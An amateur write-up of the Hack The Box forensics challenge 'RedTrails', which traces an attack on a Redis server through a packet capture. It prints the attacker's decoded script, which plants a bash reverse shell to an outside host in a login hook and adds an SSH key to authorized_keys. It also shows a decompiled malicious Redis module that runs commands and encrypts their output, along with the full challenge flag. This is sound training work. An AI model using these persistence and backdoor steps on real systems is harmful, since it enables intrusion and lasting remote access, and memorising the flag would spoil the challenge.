# RedTrails
HTB challenge: medium
**Note:** I’m just an amateur and my English isn’t very good.
**Scenerio:**
>Our SOC team detected a suspicious activity on one of our redis instance. Despite the fact it was password protected it seems that the attacker still obtained access to it. We need to put in place a remediation strategy as soon as possible, to do that it's necessary to gather more informations about the attack used. NOTE: flag is composed by three parts.
The challenge provide capture.pcap file so I use wireshark to investiagate.
Then I go to check tcp stream 0 which contain lots of information including email, password account and also FLAG_PART==_c0uld_0p3n_n3w.
Scrolling to the end, I saw suspicious download requests
The attacker had download file Vgly8V0Zxo through http protocol so I will export it and I get file text which is similar to bash script.
It's obvious that $s seems to be base64 and reversed. It can be recovered by rev command in linux or using following python code
```python
text = str(input("Input text reversed: "))
lst = list(text)
rev = lst[::-1]
rev_text = ''.join(rev)
print(rev_text)
```
After rev and decode base64 this bash script will execute following command. Now we get a part of the flag in ssh-rsa key ```HTB{r3d15_1n574nc35```
```bash
echo 'bash -c "bash -i >& /dev/tcp/10.10.0.200/1337 0>&1"' > /etc/update-motd.d/00-header
echo -e "\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC8Vkq9UTKMakAx2Zq+PnZNc6nYuEK3ZVXxH15bbUeB+elCb3JbVJyBfvAuZ0sonfAqZsyq9Jg6/KGtNsEmtVKXroPXhzFumTgg7Z1NvrUNvnqLIcfxTnP1+/4X284hp0bF2VbITb6oQKgzRdOs8GtOasKaK0k//2E5o0RKIEdrx0aL5HBOGPx0p8GrGe4kRKoAokGXwDVT22LlBylRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IfLMD/FQNy1B4DYhsY62O7o2xR0vxkBEp5UhBAX8gOTG0wjzrUHxmdUimXgiy39YVZaTJQwLBtzJS//YhkewyF/+CP0H7wIKIErlf5WFK5skLYO6uKVpx6akGXY8GADnPU3iPK/MtBC+RqWssdkGqFIA5xG2Fn+Klid9Obm1uXexJfYVjJMOfvuqtb6KcgLmi5uRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IlSxaiOAD2iNJboNuUIxMH/9HNYKd6mlwUpovqFcGBqXizcF21bxNGoOE31Vfox2fq2qW30BDWtHrrYi76iLh02FerHEYHdQAAA08NfUHyCw0fVl/qt6bAgKSb02k691lcDAo5JpEEzNQpub0X8xJItrbw==HTB{r3d15_1n574nc35" >> ~/.ssh/authorized_keys
```
This script will overwite
``` bash -c "bash -i >& /dev/tcp/10.10.0.200/1337 0>&1"```(reverse shell) to file
```/etc/update-motd.d/00-header```. This action create an interactive bash opens a TCP connection to IP 10.10.0.200 port 1337 and redirects I/O (stdin, stdout, stderr) to that socket meaning that an attacker can get a remote shell
```/etc/update-motd.d/00-header``` is a directory for script that run when user log in. If the file ```00-header``` is executable, a revershell will be opened.
Second command used to append SSH key which allowing attacker to login to that account via SSH key-based authentication without using password
```AAAAB...trbw==``` is SSH public key
Subsequently, I discovered suspicious data in TCP stream 6 which may be a ELF file. So I extract raw data and do progress to convert to ELF file
```python
output_file = str(input("Output file name: "))
with open("raw.txt","r") as file:
raw = file.read()
hex_data = bytes.fromhex(raw)
with open("output.so","wb") as file:
file.write(hex_data)
print(f"[+] {len(hex_data)} had been write to {output_file}")
```
After running this script I received ELF file
I use ghidra to investigate
Function: DoCommand()
```C
undefined8 DoCommand(undefined8 param_1,long param_2,int param_3)
{
byte bVar1;
long lVar2;
code *pcVar3;
FILE *__stream;
int iVar4;
size_t sVar5;
char *pcVar6;
EVP_CIPHER *cipher;
size_t sVar7;
ulong uVar8;
undefined8 uVar9;
undefined8 uVar10;
long *plVar11;
long in_FS_OFFSET;
long local_1108 [3];
int local_10ec;
long local_10e8;
undefined8 local_10e0;
int local_10d8;
int local_10d4;
int local_10d0;
int local_10cc;
undefined1 local_10c8 [8];
size_t local_10c0;
uchar *local_10b8;
char *local_10b0;
FILE *local_10a8;
char *local_10a0;
char *local_1098;
char *local_1090;
EVP_CIPHER_CTX *local_1088;
long local_1080;
char *local_1078;
undefined8 local_1070;
uchar local_1068 [16];
uchar local_1058 [32];
byte local_1038 [4104];
long local_30;
plVar11 = local_1108;
local_30 = *(long *)(in_FS_OFFSET + 0x28);
local_10ec = param_3;
local_10e8 = param_2;
local_10e0 = param_1;
if (param_3 == 2) {
local_10c0 = 0x1000;
local_10b0 = (char *)(*RedisModule_StringPtrLen)(*(undefined8 *)(param_2 + 8),local_10c8);
local_10a8 = popen(local_10b0,"r");
local_10a0 = (char *)malloc(local_10c0);
local_10b8 = (uchar *)malloc(local_10c0);
while( true ) {
pcVar6 = fgets(local_10a0,8,local_10a8);
if (pcVar6 == (char *)0x0) break;
sVar7 = strlen(local_10a0);
sVar5 = strlen((char *)local_10b8);
if (local_10c0 <= sVar5 + sVar7) {
local_10b8 = (uchar *)realloc(local_10b8,local_10c0 * 4);
local_10c0 = local_10c0 << 1;
}
FUN_00107220(local_10b8,local_10a0);
}
local_1098 = "h02B6aVgu09Kzu9QTvTOtgx9oER9WIoz";
local_1090 = "YDP7ECjzuV7sagMN";
strncpy((char *)local_1058,"h02B6aVgu09Kzu9QTvTOtgx9oER9WIoz",0x20);
strncpy((char *)local_1068,local_1090,0x10);
local_1088 = EVP_CIPHER_CTX_new();
cipher = EVP_aes_256_cbc();
EVP_EncryptInit_ex(local_1088,cipher,(ENGINE *)0x0,local_1058,local_1068);
sVar7 = strlen((char *)local_10b8);
EVP_EncryptUpdate(local_1088,local_1038,&local_10d8,local_10b8,(int)sVar7);
local_10cc = local_10d8;
EVP_EncryptFinal_ex(local_1088,local_1038 + local_10d8,&local_10d8);
local_10cc = local_10cc + local_10d8;
EVP_CIPHER_CTX_free(local_1088);
iVar4 = local_10cc * 2 + 1;
local_1080 = (long)iVar4 + -1;
local_1108[0] = (long)iVar4;
local_1108[1] = 0;
uVar8 = (((long)iVar4 + 0xfU) / 0x10) * 0x10;
for (; plVar11 != (long *)((long)local_1108 - (uVar8 & 0xfffffffffffff000));
plVar11 = (long *)((long)plVar11 + -0x1000)) {
*(undefined8 *)((long)plVar11 + -8) = *(undefined8 *)((long)plVar11 + -8);
}
lVar2 = -(ulong)((uint)uVar8 & 0xfff);
if ((uVar8 & 0xfff) != 0) {
*(undefined8 *)((long)plVar11 + ((ulong)((uint)uVar8 & 0xfff) - 8) + lVar2) =
*(undefined8 *)((long)plVar11 + ((ulong)((uint)uVar8 & 0xfff) - 8) + lVar2);
}
local_1078 = (char *)((long)plVar11 + lVar2);
local_10d0 = 0;
for (local_10d4 = 0; pcVar6 = local_1078, local_10d4 < local_10cc; local_10d4 = local_10d4 + 1)
{
bVar1 = local_1038[local_10d4];
pcVar6 = local_1078 + local_10d0;
*(undefined8 *)((long)plVar11 + lVar2 + -8) = 0x10a314;
snprintf(pcVar6,3,"%02x",(ulong)bVar1);
local_10d0 = local_10d0 + 2;
}
local_1078[local_10cc * 2] = '\0';
*(undefined8 *)((long)plVar11 + lVar2 + -8) = 0x10a35e;
hexStringToBytes(pcVar6,local_1038);
pcVar6 = local_1078;
*(undefined8 *)((long)plVar11 + lVar2 + -8) = 0x10a36d;
sVar7 = strlen(pcVar6);
pcVar6 = local_1078;
pcVar3 = RedisModule_CreateString;
local_10cc = (int)(sVar7 >> 1);
*(undefined8 *)((long)plVar11 + lVar2 + -8) = 0x10a38f;
sVar7 = strlen(pcVar6);
pcVar6 = local_1078;
uVar10 = local_10e0;
*(undefined8 *)((long)plVar11 + lVar2 + -8) = 0x10a3a8;
uVar9 = (*pcVar3)(uVar10,pcVar6,sVar7);
uVar10 = local_10e0;
local_1070 = uVar9;
*(undefined8 *)((long)plVar11 + lVar2 + -8) = 0x10a3cf;
(*RedisModule_ReplyWithString)(uVar10,uVar9);
__stream = local_10a8;
*(undefined8 *)((long)plVar11 + lVar2 + -8) = 0x10a3de;
pclose(__stream);
uVar10 = 0;
}
else {
uVar10 = (*RedisModule_WrongArity)(param_1);
}
if (local_30 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return uVar10;
}
Beta
0 / 0
used queries
1
```
**Summary:**
**Source: chatgpt :>>>**
I get key and iv of AES cipher is ```h02B6aVgu09Kzu9QTvTOtgx9oER9WIoz``` and ```YDP7ECjzuV7sagMN```, respectfully. So I think we need to find something to decrypt and get final part of flag.
After finishing download and execute process of file ```Vgly8V0Zxo```, attacker sent some request to victim
I tried to convert ```3948...4952``` to file but it's real text so I guessed that it's a cipher text. Let's decrypt it by cyberchef and get flag !
```_un3xp3c73d_7r41l5!}```
> Flag: HTB{r3d15_1n574nc35_c0uld_0p3n_n3w_un3xp3c73d_7r41l5!}
Sign in with Wallet
Connect another wallet